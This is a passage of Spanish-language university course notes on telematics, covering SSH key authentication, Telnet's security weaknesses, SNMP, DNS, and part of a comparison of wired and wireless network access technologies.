un par de "llaves" para su computador, una pública y una privada. Una vez instalado podrá afinar la
configuración del servidor en el archivo /etc/ssh/sshd_config que puede incluir líneas como las
siguientes:

PermitRootLogin no
RSAAuthentication yes
PubkeyAuthentication yes
RhostsAuthentication no
hostsRSAAuthentication no
HostbasedAuthentication no
X11Forwarding yes

La última línea permitirá a los clientes que se conecten ejecutar aplicaciones de X-Window y transmitir la
información gráfica sobre la conexión segura.
Un usuario también puede crear un par de llaves que le faciliten su autenticación al emplear ssh o scp.
Estos programas por defecto piden clave al usuario que se conecte a un servidor SSH. Si un usuario
genera sus llaves pública y privada, puede saltarse esta autenticación pues se hará de forma automática
con las llaves. Para lograrlo su llave pública debe estar en el computador al cual se conecta (en
~/.ssh/authorized_keys) y su llave privada en el computador desde el cual se conecta (normalmente en
~/.ssh/id_dsa).
La generación de llaves puede hacerse con:

ssh-keygen -t dsa
que por defecto dejará su llave pública en ~/.ssh/id_dsa.pub y su llave privada en ~/.ssh/id_dsa (que
además quedará protegida por una palabra clave que usted especifica). Como el nombre indica, la llave

____________________________________________________________________________________________________________________
UNdeC Página 58
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

privada no debe compartirla, por el contrario la llave pública puede transmitirla y puede ser vista por
cualquiera.
En el computador en el que desee conectarse, agregue en el archivo ~/.ssh/authorized_keys (o
~/.ssh/authorized_keys2 si usa DSA y una versión de OpenSSH anterior a la 3.1), su llave pública. Por
ejemplo el usuario mario desde purpura.micolegio.edu.co puede configurar la entrada con autenticación
automática a la cuenta pepe en amarillo.micolegio.edu.co con:

purpura> scp ~/.ssh/id_dsa.pub amarillo.micolegio.edu.co:/home/pepe/id_dsa_mario.pub


purpura> ssh -l pepe amarillo.micolegio.edu.co
...
amarillo> cat id_dsa_mario.pub >> ~/.ssh/authorized_keys

Cuando Mario se intente conectar desde púrpura, a la cuenta pepe en amarillo ya no tendrá que dar la
clave de pepe en ese computador sino la palabra clave con la que protegió su llave privada. Incluso esta
palabra clave puede darse una sola vez, aún cuando se realicen diversas conexiones con:

purpura> ssh-agent bash


purpura> ssh-add mario

Tras lo cual Mario tecleará una vez la palabra clave de su llave privada, y después en esa sesión de
BASH todo ingreso que haga a la cuenta pepe en amarillo, no solicitará clave alguna.

4.6. TELNET
Telnet es el nombre de un protocolo (y del programa informático que implementa el cliente) que sirve
para acceder mediante una red a otra máquina, para manejarla como si estuviéramos sentados delante
de ella. Para que la conexión funcione, como en todos los servicios de Internet, la máquina a la que se
acceda debe tener un programa especial que reciba y gestione las conexiones. El puerto que se utiliza
generalmente es el 23.
Sólo sirve para acceder en modo terminal, es decir, sin gráficos, pero fue una herramienta muy útil para
arreglar fallos a distancia, sin necesidad de estar físicamente en el mismo sitio que la máquina que los
tenía. También se usaba para consultar datos a distancia, como datos personales en máquinas
accesibles por red, información bibliográfica, etc.
Aparte de estos usos, en general telnet se ha utilizado (y aún hoy se puede utilizar en su variante SSH)
para abrir una sesión con una máquina UNIX, de modo que múltiples usuarios con cuenta en la máquina,
se conectan, abren sesión y pueden trabajar utilizando esa máquina. Es una forma muy usual de trabajar
con sistemas UNIX.
Su mayor problema es de seguridad, ya que todos los nombres de usuario y contraseñas necesarias
para entrar en las máquinas viajan por la red como texto plano (cadenas de texto sin cifrar). Esto facilita
que cualquiera que espíe el tráfico de la red pueda obtener los nombres de usuario y contraseñas, y así
acceder él también a todas esas máquinas. Por esta razón dejó de usarse, casi totalmente, hace unos
años, cuando apareció y se popularizó el SSH, que puede describirse como una versión cifrada de telnet.
Hoy en día este protocolo también se usa para acceder a los BBS, que inicialmente eran accesibles
únicamente con un módem a través de la línea telefónica. Para acceder a un BBS mediante telnet es
necesario un cliente que dé soporte a gráficos ANSI y protocolos de transferencia de ficheros. Los
gráficos ANSI son muy usados entre los BBS. Con los protocolos de transferencia de ficheros (el más
común y el que mejor funciona es el ZModem) podrás enviar y recibir ficheros del BBS, ya sean
programas o juegos o ya sea el correo del BBS (correo local, de FidoNet u otras redes).
Algunos clientes de telnet (que soportan gráficos ANSI y protocolos de transferencias de ficheros como
Zmodem y otros) son mTelnet!, NetRunner, Putty, Zoc, etc...

Manejo básico de telnet


Para iniciar una sesión con un intérprete de comandos de otro computador, puede emplear el comando
telnet seguido del nombre o la dirección IP de la máquina en la que desea trabajar, por ejemplo si desea

____________________________________________________________________________________________________________________
UNdeC Página 59
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

conectarse a la máquina purpura.micolegio.edu.co deberá teclear telnet purpura.micolegio.edu.co, y para


conectarse con la dirección IP 1.2.3.4 deberá utilizar telnet 1.2.3.4.
Una vez conectado, podrá ingresar el nombre de usuario y contraseña remoto para iniciar una sesión en
modo texto a modo de consola virtual (ver Lectura Sistema de usuarios y manejo de clave). La
información que transmita (incluyendo su clave) no será protegida o cifrada y podría ser vista en otros
computadores por los que se transite la información (la captura de estos datos se realiza con sniffers
http://es.wikipedia.org/wiki/Packet_sniffer).
Una alternativa más segura para telnet, pero que requiere más recursos del computador es SSH que
cifra la información antes de transmitirla, que autentica la máquina a la cual se conecta y que puede
emplear mecanismos de autenticación de usuarios más seguros.

Seguridad
Hay tres razones principales por las que el telnet no se recomienda para los sistemas modernos desde el
punto de vista de la seguridad:
Los demonios de uso general del telnet tienen varias vulnerabilidades descubiertas sobre los años, y
varias más que podrían aún existir.
Telnet, por defecto, no cifra ninguno de los datos enviados sobre la conexión (contraseñas inclusive), así
que es trivial escuchar detrás de las puertas en las comunicaciones, y utilizar la contraseña más adelante
para propósitos maliciosos.
Telnet carece de un esquema de autentificación que permita asegurar que la comunicación esté siendo
realizada entre los dos anfitriones deseados, y no interceptado en el centro.
En ambientes donde es importante la seguridad, por ejemplo en el Internet público, telnet no debe ser
utilizado. Las sesiones de telnet no son cifradas. Esto significa que cualquiera que tiene acceso a
cualquier router, switch, o gateway localizado en la red entre los dos anfitriones donde se está utilizando
telnet puede interceptar los paquetes de telnet que pasan cerca y obtener fácilmente la información de la
conexión y de la contraseña (y cualquier otra cosa que se mecanografía) con cualesquiera de varias
utilidades comunes como tcpdump y Wireshark.
Estos defectos han causado el abandono y depreciación del protocolo telnet rápidamente, a favor de un
protocolo más seguro y más funcional llamado SSH, lanzado en 1995. SSH provee de toda la
funcionalidad presente en telnet, la adición del cifrado fuerte para evitar que los datos sensibles tales
como contraseñas sean interceptados, y de la autentificación mediante llave pública, para asegurarse de
que el computador remoto es realmente quién dice ser.
Los expertos en seguridad computacional, tal como el instituto de SANS, y los miembros del newsgroup
de comp.os.linux.security recomiendan que el uso del telnet para las conexiones remotas debería ser
descontinuado bajo cuaquier circunstancia normal. ......... Cuando el telnet fue desarrollado inicialmente
en 1969, la mayoría de los usuarios de computadoras en red estaban en los servicios informáticos de
instituciones académicas, o en grandes instalaciones de investigación privadas y del gobierno. En este
ambiente, la seguridad no era una preocupación y solo se convirtió en una preocupación después de la
explosión del ancho de banda de los años 90. Con la subida exponencial del número de gente con el
acceso al Internet, y por la extensión, el número de gente que procura crackear los servidores de otra
gente, telnet podría no ser recomendado para ser utilizado en redes con conectividad a Internet. asdf

4.7. SNMP
El Protocolo Simple de administración de red o SNMP es un protocolo de la capa de aplicación que
facilita el intercambio de información de administración entre dispositivos de red. Es parte de la suite de
protocolos TCP/IP. SNMP permite a los administradores supervisar el desempeño de la red, buscar y
resolver sus problemas, y planear su crecimiento.
Las versiones de SNMP más utilizadas son dos: SNMP versión 1 (SNMPv1) y SNMP versión 2
(SNMPv2). Ambas versiones tienen un número de características en común, pero SNMPv2 ofrece
mejoras, como por ejemplo, operaciones adicionales.
SNMP en su última versión (SNMPv3) posee cambios significativos con relación a sus predecesores,
sobre todo en aspectos de seguridad, sin embargo no ha sido mayoritariamente aceptado en la industria.

Componentes básicos de SNMP


Una red administrada a través de SNMP consiste de tres componentes claves:

____________________________________________________________________________________________________________________
UNdeC Página 60
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

Dispositivos administrados.
Agentes.
Sistemas administradores de red (NMS’s)
Un dispositivo administrado es un nodo de red que contiene un agente SNMP y reside en una red
administrada. Estos recogen y almacenan información de administración, la cual es puesta a disposición
de los NMS’s usando SNMP. Los dispositivos administrados, a veces llamados elementos de red,
pueden ser routers, servidores de acceso, switches, bridges, hubs, computadores o impresoras.
Un agente es un módulo de software de administración de red que reside en un dispositivo administrado.
Un agente posee un conocimiento local de información de administración (por ejemplo: memoria libre,
número de paquetes IP recibidos, ruta por defecto), la cual es organizada en jerarquías descritas en la
base de información de administración o MIB (ver abajo).
Un NMS ejecuta aplicaciones que supervisan y controlan a los dispositivos administrados. Los NMS’s
proporcionan el volumen de recursos de procesamiento y memoria requeridos para la administración de
la red. Uno o más NMS’s deben existir en cualquier red administrada.

Comandos básicos de SNMP


Los dispositivos administrados son supervisados y controlados usando cuatro comandos SNMP básicos:
lectura, escritura, notificación y operaciones transversales.
El comando de lectura es usado por un NMS para supervisar elementos de red. El NMS examina
diferentes variables que son mantenidas por los dispositivos administrados.
El comando de escritura es usado por un NMS para controlar elementos de red. El NMS cambia los
valores de las variables almacenadas dentro de los dispositivos administrados.
El comando de notificación es usado por los dispositivos administrados para reportar eventos en forma
asíncrona a un NMS. Cuando cierto tipo de evento ocurre, un dispositivo administrado envía una
notificación al NMS.
Las operaciones transversales son usadas por el NMS para determinar qué variables soporta un
dispositivo administrado y para recoger secuencialmente información en tablas de variables, como por
ejemplo, una tabla de rutas.

Base de información de administración SNMP (MIB)


Una base de información de administración (MIB) es una colección de información que está organizada
jerárquicamente. Las MIB’s son accedidas usando un protocolo de administración de red, como por
ejemplo, SNMP.
Un objeto administrado (algunas veces llamado objeto MIB, objeto, o MIB) es uno de cualquier número
de características específicas de un dispositivo administrado. Los objetos administrados están
compuestos de una o más instancias de objeto, que son esencialmente variables. Están implementadas
usando ASN.1.
Existen dos tipos de objetos administrados: escalares y tabulares. Los objetos escalares definen una
simple instancia de objeto. Los objetos tabulares definen múltiples instancias de objeto relacionadas que
están agrupadas conjuntamente en tablas MIB.
Un ejemplo de un objeto administrado es atInput, que es un objeto escalar que contiene una simple
instancia de objeto, el valor entero que indica el número total de paquetes AppleTalk de entrada sobre
una interfaz de un router.
Un identificador de objeto (object ID) únicamente identifica un objeto administrado en la jerarquía MIB. La
jerarquía MIB puede ser representada como un árbol con una raíz anónima y los niveles, que son
asignados por diferentes organizaciones.

____________________________________________________________________________________________________________________
UNdeC Página 61
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

El árbol MIB ilustra las variadas jerarquías asignadas por las diferentes organizaciones
Los identificadores de los objetos ubicados en la parte superior del árbol pertenecen a diferentes
organizaciones estándares, mientras los identificadores de los objetos ubicados en la parte inferior del
árbol son colocados por las organizaciones asociadas.
Los vendedores pueden definir ramas privadas que incluyen los objetos administrados para sus propios
productos. Las MIB’s que no han sido estandarizadas típicamente están localizadas en la rama
experimental.
El objeto administrado atInput podría ser identificado por el nombre de objeto iso.identified-
organization.dod.internet.private.enterprise.cisco.temporary.AppleTalk.atInput o por el descriptor de
objeto equivalente 1.3.6.1.4.1.9.3.3.1.
El corazón del árbol MIB se encuentra compuesto de varios grupos de objetos, los cuales en su conjunto
son llamados mib-2. Los grupos son los siguientes:
System (1)
Interfaces (2)
AT (3)
IP (4)
ICMP (5)
TCP (6)
UDP (7)
EGP (8)
Transmission (10)
SNMP (11)

Notación de sintaxis abstracta 1 (ASN.1)


Artículo principal: ASN.1
En las telecomunicaciones y las redes de ordenadores, la notación de sintaxis abstracta nº 1(Abstract
Syntax Notation One, ASN.1) es una notación estándar y flexible para describir estructuras de datos que
pueden ser usadas para representar, codificar, transmitir y decodificar datos. Está compuesta por una
serie de reglas formales para describir la estructura de objetos de manera que sean independientes de la
máquina en la que se estén interpretando y sean precisos, es decir, que no dé lugar a ambigüedades.
ASN.1 es un estándar conjunto de ISO y la UIT-T, creado originalmente en 1984 como una parte de
CCITT X.409:1984. ASN.1 evolucionó y en 1988, dada su gran versatilidad, se convirtió en estándar
propio, bajo el nombre de X.208. En 1995 se revisó sustancialmente y el nuevo estándar se definió en la
serie X.680.
Una parte de ASN.1, la estructura de información gestionada (Structure of Management Information,
SMI), se adaptó a SNMP para definir objetos MIB interrelacionados, llamados también módulos MIB.

____________________________________________________________________________________________________________________
UNdeC Página 62
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

Mensajes SNMP
Para realizar las operaciones básicas de administración anteriormente nombradas, el protocolo SNMP
utiliza un servicio no orientado a la conexión (UDP) para enviar un pequeño grupo de mensajes (PDUs)
entre los administradores y agentes. La utilización de un mecanismo de este tipo asegura que las tareas
de administración de red no afectarán al rendimiento global de la misma, ya que se evita la utilización de
mecanismos de control y recuperación como los de un servicio orientado a la conexión, por ejemplo
TCP.
Los puertos asignados por la IANA para el protocolo SNMP son los siguientes:
Puerto/protocolo Descripción

161/tcp SNMP

161/udp SNMP

162/tcp SNMP-trap

162/udp SNMP-trap
Las tramas tienen el siguiente formato:
Versión Comunidad SNMP PDU
Donde versión es el número de versión de protocolo que se está aplicando. En SNMPv1, vale 1. La
comunidad es un nombre que se usa para la autenticación. Generalmente, existe una comunidad de
lectura (que puede consultar los valores en el agente, pero no modificarlos) llamada "public" y una
comunidad de escritura en algunos casos llamada "private". El contenido de la unidad de datos del
protocolo (SNMP PDU) depende de la operación que estemos realizando. Las operaciones GetRequest,
GetNextRequest y SetRequest tienen la siguiente SNMP PDU:
Tipo de Identificador de Estado de Índice de Enlazado de variables (Variable
PDU "request" Error Error Bindings)
El identificador de request es un número. Cuando el agente responda, usará el mismo identificador. De
esta manera una estación de gestión puede realizar muchas consultas usando identificadores diferentes.
Cuando lleguen las respuestas (GetResponse) podrá saber a qué pregunta correspondían fijándose en
este valor. El estado de error e índice de error sólo se usan en los GetResponse. Las consultas llevan
siempre estos valores a 0. El campo índice de error sólo se usa cuando "estado de error" es distinto de 0
para proporcionar información adicional sobre qué provocó el error. El estado de error puede tener los
siguientes valores:
0: No hay error
1: Demasiado grande
2: No existe esa variable
3: Valor incorrecto
4: El valor es de solo lectura (si hemos pedido escribir en un valor en el que no podemos).
5: Error genérico
El Enlazado de variables (Variable Bindings) son una serie de nombres de variables y sus valores
correspondientes codificados en ASN.1. Si el gestor está consultando el valor de las variables, manda el
valor NULL, de manera que el agente rellene dicha información.
GetRequest
A través de este mensaje el NMS solicita al agente retornar el valor de un objeto de interés mediante su
nombre. En respuesta el agente envía una respuesta indicando el éxito o fracaso del requerimiento. Si el
requerimiento fue adecuado, el mensaje resultante también contendrá el valor del objeto solicitado. Este
mensaje puede ser usado para recoger un valor de un objeto, o varios valores de varios objetos, a través
del uso de listas.
GetNextRequest
Este mensaje es usado para recorrer una tabla de objetos. Una vez que se ha usado un mensaje
GetRequest para recoger el valor de un objeto, puede ser utilizado el mensaje GetNextRequest para
repetir la operación con el siguiente objeto de la tabla. Siempre el resultado de la operación anterior será

____________________________________________________________________________________________________________________
UNdeC Página 63
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

utilizado para la nueva consulta. De esta forma un NMS puede recorrer una tabla de longitud variable
hasta que haya extraído toda la información para cada fila existente.
SetRequest
Este tipo de mensaje es utilizado por el NMS para solicitar a un agente modificar valores de objetos.
Para realizar esta operación el NMS envía al agente una lista de nombres de objetos con sus
correspondientes valores.
GetResponse
Este mensaje es usado por el agente para responder un mensaje GetRequest, GetNextRequest, o
SetRequest. En el campo "Identificador de Request" lleva el mismo identificador que el "request" al que
está respondiendo.
Trap
Una trap es generada por el agente para reportar ciertas condiciones y cambios de estado a un proceso
de administración. El formato de la PDU es diferente:
Tipo de Dirección del Tipo genérico Tipo específico Enlazado de variables
Enterprise Timestamp
PDU agente de trap de trap (Variable Bindings)
En el campo enterprise se identifica al subsistema de gestión que ha emitido la trap. El campo dirección
del agente lleva la dirección IP del agente que emite la trap. El tipo genérico de trap puede ser:
Cold start(0): Indica que el agente ha sido inicializado o reinicializado.
Warm start(1): Indica que la configuración del agente ha cambiado.
Link down(2): Indica que una interfaz de comunicación ha dejado de funcionar.
Link up(3): Indica que una interfaz de comunicación vuelve a estar en servicio.
Authentication failure(4): Indica que el agente ha recibido un requerimiento de un administrador no
autorizado.
EGP neighbor loss(5): Indica que en sistemas en que los routers están utilizando el protocolo EGP, un
equipo colindante se encuentra fuera de servicio.
Enterprise Specific(6): En esta categoría se engloban todos los nuevos traps que son incluidos por los
vendedores. El tipo de trap se indica en el campo "tipo específico de la trap".
Como se explicó anteriormente, el campo tipo específico de trap es el usado para las traps específicas
de los fabricantes, así como para precisar la información de una determinada trap genérica. El campo
timestamp indica el tiempo que ha transcurrido entre la reinicialización del agente y la generación de la
trap. Se puede usar el campo enlazado de variables para proporcionar información adicional sobre la
causa de la trap.
GetBulkRequest
Este mensaje es usado por un NMS que utiliza la versión 2 del protocolo SNMP típicamente cuando es
requerida una larga transmisión de datos, tal como la recuperación de largas tablas. En este sentido es
similar al mensaje GetNextRequest usado en la versión 1 del protocolo, sin embargo, GetBulkRequest es
un mensaje que implica un método mucho más rápido y eficiente, ya que a través de un solo mensaje es
posible solicitar la totalidad de la tabla.
InformRequest
Un NMS que utiliza la versión 2 del protocolo SNMP transmite un mensaje de este tipo a otro NMS con
las mismas características, para notificar información sobre objetos administrados.

4.8. DNS
El Domain Name System (DNS) es una base de datos distribuida y jerárquica que almacena información
asociada a nombres de dominio en redes como Internet. Aunque como base de datos el DNS es capaz
de asociar distintos tipos de información a cada nombre, los usos más comunes son la asignación de
nombres de dominio a direcciones IP y la localización de los servidores de correo electrónico de cada
dominio.
La asignación de nombres a direcciones IP es ciertamente la función más conocida de los protocolos
DNS. Por ejemplo, si la dirección IP del sitio FTP de prox.ve es 200.64.128.4, la mayoría de la gente
llega a este equipo especificando ftp.prox.ve y no la dirección IP. Además de ser más fácil de recordar, el
nombre es más fiable. La dirección numérica podría cambiar por muchas razones, sin que tenga que
cambiar el nombre.

____________________________________________________________________________________________________________________
UNdeC Página 64
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

Inicialmente, el DNS nació de la necesidad de recordar fácilmente los nombres de todos los servidores
conectados a Internet. En un inicio, SRI (ahora SRI International) alojaba un archivo llamado HOSTS que
contenía todos los nombres de dominio conocidos (técnicamente, este archivo aún existe - la mayoría de
los sistemas operativos actuales todavía pueden ser configurados para revisar su archivo hosts).
El crecimiento explosivo de la red causó que el sistema de nombres centralizado en el archivo HOSTS
no resultara práctico y en 1983, Paul Mockapetris publicó los RFCs 882 y 883 definiendo lo que hoy en
día ha evolucionado al DNS moderno. (Estos RFCs han quedado obsoletos por la publicación en 1987
de los RFCs 1034 y 1035).

Componentes
Para la operación práctica del sistema DNS se utilizan tres componentes principales:
Los Clientes DNS (resolvers), un programa cliente DNS que se ejecuta en la computadora del usuario y
que genera peticiones DNS de resolución de nombres a un servidor DNS (Por ejemplo: ¿Qué dirección
IP corresponde a nombre.dominio?);
Los Servidores DNS (name servers), que contestan las peticiones de los clientes, los servidores
recursivos tienen la capacidad de reenviar la petición a otro servidor si no disponen de la dirección
solicitada;
Y las Zonas de autoridad, porciones del espacio de nombres de dominio que almacenan los datos. Cada
zona de autoridad abarca al menos un dominio y posiblemente sus subdominios, si estos últimos no son
delegados a otras zonas de autoridad.

Entendiendo las partes de un nombre de dominio


Un nombre de dominio usualmente consiste en dos o más partes (técnicamente etiquetas), separadas
por puntos cuando se las escribe en forma de texto. Por ejemplo, www.mahomedalid.org o
es.Wikipedia.org
A la etiqueta ubicada más a la derecha se le llama dominio de nivel superior (inglés < Top Level
Domain). Como org en www.mahomedalid.org ó es.Wikipedia.org
Cada etiqueta a la izquierda especifica una subdivisión o subdominio. Nótese que "subdominio" expresa
dependencia relativa, no dependencia absoluta. En teoría, esta subdivisión puede tener hasta 127
niveles, y cada etiqueta contener hasta 63 caracteres, pero restringido a que la longitud total del nombre
del dominio no exceda los 255 caracteres, aunque en la práctica los dominios son casi siempre mucho
más cortos.
Finalmente, la parte más a la izquierda del dominio suele expresar el nombre de la máquina (en inglés
hostname). El resto del nombre de dominio simplemente especifica la manera de crear una ruta lógica a
la información requerida. Por ejemplo, el dominio es.Wikipedia.org tendría el nombre de la máquina "es",
aunque en este caso no se refiere a una máquina física en particular.
El DNS consiste en un conjunto jerárquico de servidores DNS. Cada dominio o subdominio tiene una o
más zonas de autoridad que publican la información acerca del dominio y los nombres de servicios de
cualquier dominio incluido. La jerarquía de las zonas de autoridad coincide con la jerarquía de los
dominios. Al inicio de esa jerarquía se encuentra los servidores raíz: los servidores que responden
cuando se busca resolver un dominio de primer y segundo nivel.

Tipos de servidores DNS


Bind • PowerDNS • MaraDNS • djbdns • pdnsd • MyDNS

Tipos de resolución de nombres de dominio


Existen dos tipos de consultas que un cliente (resolver) puede hacer a un servidor DNS:
Iterativa
Recursiva
En las consultas recursivas el servidor repite el mismo proceso básico (consultar a un servidor remoto y
seguir cualquier referencia) hasta que obtiene la respuesta a la pregunta.
Las consultas iterativas, o resolución iterativa, consisten en la mejor respuesta que el servidor de
nombres pueda dar. El servidor de nombres consulta sus datos locales (incluyendo su caché) buscando
los datos solicitados.

____________________________________________________________________________________________________________________
UNdeC Página 65
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

Cuando existe más de un servidor autoritario para una zona, BIND utiliza el menor valor en la métrica
RTT (round-trip time) para seleccionar el servidor. El RTT es una medida para determinar cuánto tarda
un servidor en responder una consulta.
El proceso de resolución normal se da de la siguiente manera:
El servidor A recibe una consulta recursiva desde el cliente DNS.
El servidor A envía una consulta iterativa a B.
El servidor B refiere a A otro servidor de nombres, incluyendo a C.
El servidor A envía una consulta iterativa a C.
El servidor C refiere a A otro servidor de nombres, incluyendo a D.
El servidor A envía una consulta iterativa a D.
El servidor D responde.
El servidor A regresa la respuesta al resolver.
El resolver entrega la respuesta al programa que solicitó la información.

Tipos de registros DNS


A = Address – (Dirección) Este registro se usa para traducir nombres de hosts a direcciones IP.
CNAME = Canonical Name – (Nombre Canónico) Se usa para crear nombres de hosts adicionales, o
alias, para los hosts de un dominio.
NS = Name Server – (Servidor de Nombres) Define la asociación que existe entre un nombre de dominio
y los servidores de nombres que almacenan la información de dicho dominio. Cada dominio se puede
asociar a una cantidad cualquiera de servidores de nombres.
MX = Mail Exchange – (Intercambiador de Correo) Define el lugar donde se aloja el correo que recibe el
dominio.
PTR = Pointer – (Indicador) También conocido como 'registro inverso', funciona a la inversa del registro
A, traduciendo IPs en nombres de dominio.
SOA = Start of authority – (Autoridad de la zona) Proporciona información sobre la zona.
HINFO = Host INFOrmation – (Información del sistema informático) Descripción del host, permite que la
gente conozca el tipo de máquina y sistema operativo al que corresponde un dominio.
TXT = TeXT - ( Información textual) Permite a los dominios identificarse de modos arbitrarios.

____________________________________________________________________________________________________________________
UNdeC Página 66
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

5. WIRELESS.
Análisis comparado de las diferentes alternativas tecnológicas de conectividad: Identificación de
debilidades y fortalezas de la alternativa Wireless Fidelity

5.1. Resumen.
En los últimos años se ha popularizado el uso de nuevas tecnologías inalámbricas en redes, tanto para
el acceso a usuarios finales como para segmentos de enlace, ofreciendo nuevas opciones que
sustituyen los medios físicos tradicionales. Las mismas no requieren infraestructura física para dar
conectividad al usuario, lo que representa una alternativa de rápida construcción, puesta en marcha y
uso.
En este artículo se presentan las características técnicas de la conectividad brindada por diversas
tecnologías, y se analizan en comparación con Wireless Fidelity (Wi-Fi) de forma de identificar sus
debilidades y fortalezas.

5.2. Introducción
La infraestructura de una red define los servicios que la misma brinda, entre otras características: ancho
de banda, conectividad, protocolos, tipo de aplicaciones soportadas, costos, etc.
Es por esto fundamental conocer en detalle las opciones tecnológicas existentes para la construcción de
redes, de forma que ante la necesidad de planificar una nueva red o agregar conectividad a una
existente se elija la tecnología más acorde a las necesidades.
Para analizar las tecnologías a utilizar es conveniente hacer una división en dos componentes o
segmentos con diferentes características: transporte (backbone / larga distancia) y acceso (o última
milla).
El segmento de transporte es de alta velocidad, donde el medio físico predominante es fibra óptica
aunque también se utilizan satélites, por su facilidad para salvar grandes distancias y no requerir derecho
de paso. Existen en muchos países redes de microondas terrestres, tanto analógicas como digitales.
Las velocidades que se logran son muy variables, entre 10 a 800 Gbps en función de las modulaciones
utilizadas [1].
El segmento de acceso es el que permite que los usuarios el accedan a los servicios que presta la red
(por ejemplo Internet), y representa hasta el 50% del costo total de un circuito.
En este informe se presentan las distintas tecnologías que permiten a los usuarios el acceso a redes, ya
que es donde han surgido en los últimos años diversas opciones (principalmente inalámbricas) que
impactan sobre la calidad del servicio.

5.3. Opciones de Conectividad


A continuación se presenta una reseña de las distintas alternativas de conectividad, para luego comparar
las mismas con Wi-Fi de forma de identificar sus fortalezas y debilidades.
Las distintas opciones se agrupan en cableadas e inalámbricas dado que tienen características en
común, y se presta especial atención a Wi-Fi.
Junto a los detalles técnicos se indicarán los parámetros que se consideran más relevantes de una red:
facilidad de instalación, rendimiento, alcance, seguridad y mantenimiento.

Cableadas
Estas opciones ofrecen gran capacidad de transmisión de datos (hasta 10Gbps) y seguridad (tanto de
acceso por terceros como de interferencia electromagnética).
Tienen un costo alto de instalación, tanto por el despliegue físico hasta el punto de acceso del usuario
final, como los derechos de paso que eventualmente se deben pagar al estado o privados [1].
Las opciones más populares son: Ethernet, módems, cable módem, ISDN, xDSL y líneas directas.
a) Ethernet
Redes basadas en Ethernet han sido la opción más popular debido a su buen desempeño, fácil
instalación y bajo costo.

____________________________________________________________________________________________________________________
UNdeC Página 67
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

Requiere una tarjeta de red en el cliente y una boca de acceso a la red, y utiliza cable coaxial, UTP
(unshielded twisted pair), STP (shielded twisted pair) o fibra óptica.
Están basadas en los estándares IEEE 802.3 [2]. El ancho de banda varía de 10Mbps a 10Gbps (con los
recientes estándares 802.3z y 802.3ae de 1Gbps y 10Gbps [3]).
Es una opción confiable y segura. Sin embargo, cuenta con la desventaja de necesitar el tendido de la
red hasta el punto de acceso, lo cual es costoso y no permite movilidad de los dispositivos que se
conectan a la red.
b) Módem
Los módems utilizan la línea telefónica para conectarse a un proveedor (normalmente de acceso a
Internet - ISP) limitadas por la banda de 4KHz utilizada por las red telefónicas [1].

Existen varios protocolos estándares (V.90, V.92, etc.) que definen las distintas velocidades, siendo la
máxima 56 Kbps [1].
Es una opción muy barata y requiere mínimo esfuerzo de configuración. Tiene una alta disponibilidad, en
la medida que el tendido telefónico sea accesible, siendo posible elegir en cualquier momento el
proveedor de servicio más conveniente.
Como desventajas se pueden mencionar que las velocidades de conexión son menores que las máximas
anunciadas por los proveedores, los tiempos para establecer las conexiones son largos, y no es posible
utilizar la línea telefónica para voz mientras está en uso por el módem
c)Integrated Services Digital Network (ISDN)
Es un estándar surgido en los años 90 como una solución revolucionaria de acceso a Internet, aunque
en la práctica no ha tenido el éxito esperado.
También es una opción discada que utiliza la línea telefónica, pero logra velocidades de hasta 128Kbps,
soportando comunicación de voz y datos al mismo tiempo [4].
El tiempo para establecer conexiones es mucho más corto que un módem (1.5 segundos aprox.), y es
simple cambiar de proveedor cuando sea más conveniente.
Se destaca que es una tecnología cara, requiere nuevo hardware y cableado, es de difícil instalación y
no permite ser utilizada desde otro sitio que no se haya instalado.
d) Digital Subscriber Line (xDSL)
Ésta familia de estándares ofrecen conexión digital de alta velocidad (hasta 8 Mbps reales) utilizando el
mismo cableado telefónico existente, y no ocupa la línea telefónica cuando está en uso.
Hay varios estándares en esta familia:

xDSL Servicio Downstream Upstream


ADSL Asymmetric DSL 2M a 384k 256k a 128k
HDSL High-bit-rate DSL 1.5M 1.5M
SDSL Single-line DSL 1.5M 1.5M
VDSL Very-High DSL 13M a 52M 1.5M a 2.3M
IDSL ISDN DSL 144k 144k
RADSL Rate Adaptive 512k 278k
DSL
UDSL Universal DSL 1M a 384k 384k a 128k

El alto desempeño se logra utilizando 256 canales y diversas técnicas de modulación (Discrete Multitone
modulation (DMT) y Quadrature Amplitude Modulated (QAM) entre otros) [5].
En condiciones ideales estos canales transportan hasta 64 Kbps, logrando una capacidad total de 16
Mbps, aunque no se da en la práctica porque son canales de alta frecuencia atenuados y ruidosos, que
se ven afectados por la distancia.

____________________________________________________________________________________________________________________
UNdeC Página 68
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

Cabe destacar que se requiere hardware adicional (Router - Splitter y ADSL Transmission Unit (ATU)),
sólo se puede utilizar en el lugar de instalación, y el uso de un mayor ancho de banda para envío de
datos normalmente tiene costo extra.
e) Cable módem
Esta opción utiliza el cableado de la televisión por cable, logrando altas velocidades de conexión (del
orden de 40 Mbps para recepción y 10 Mbps para el envío). Estas velocidades varían según la cantidad
de abonados en el área que usan el servicio, ya que la conexión es compartida. Esto representa un
problema de seguridad adicional, que se resuelve con técnicas de encriptación y un buen diseño lógico
de los tramos [6].
Existe un estándar de la IEEE (802.14) que define las características de este tipo de redes [7].
Hay implementaciones que combinan el uso de fibra previo al tramo del usuario, logrando mayor ancho
de banda (Hybrid Fiber Coax - HFC).
Como ventajas de esta opción se destaca la velocidad de conexión, confiabilidad, alta disponibilidad, no
interfiere con el servicio original (tv cable) y es de fácil instalación.
Cabe destacar como desventajas que el ancho de banda es compartido (aunque la peor velocidad
obtenida es mucho mejor que la brindada por un módem), requiere hardware adicional (módem
especial), la velocidad de envío es mucho menor que la de recepción de datos, no permite elegir el
proveedor de servicio una vez instalado y no permite movilidad.
f) Líneas directas dedicadas
Esta es una de las primeras opciones disponibles y por lo tanto más difundidas. Es un cableado de gran
